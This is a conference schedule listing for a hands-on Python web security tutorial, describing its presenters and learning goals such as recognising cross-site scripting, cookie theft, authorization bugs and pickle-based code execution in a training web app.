top band

Thursday 9 a.m.–12:20 p.m.

Getting comfortable with web security: A hands-on session

Asheesh Laroia, Jacky Chang, Nicole Zuckerman

Audience level:


Web application security can be an intimidating discipline, yet it can be of supreme importance for the people who use the things we build. In this tutorial, you'll learn about essential topics in web security, and you will gain hands-on practice identifying and leveraging vulnerabilities in a Python-based web app. For each issue, we will cover how your code can stay on the side of safety.


After attending this tutorial, attendees will gain general knowledge, being able to: * Explain the difference between cross-site scripting and cross-site request forgery, and understand at least one way abuse each. * Describe the use of cookies in web applications and how they relate to security. * Identify authorization bugs in web applications, and name programming patterns that avoid authorization bugs. * Understand how to think like a attacker, by practicing being one. They will be able to perform and explain specific attacks as well, such as: * Taking advantage of subdomains to steal cookies, and how to use a stolen cookie to impersonate another user. * Abusing file uploads to defeat security protections within a web app. * Abusing a Django SECRET_KEY to steal a fellow user's account. * Leveraging the "pickle" module to run chosen code in the context of someone else's web app. Attendees will leave the tutorial with an appreciation of the importance of security and practical experience that enables further study.

Student Handout

No handouts have been provided yet for this tutorial

bottom band background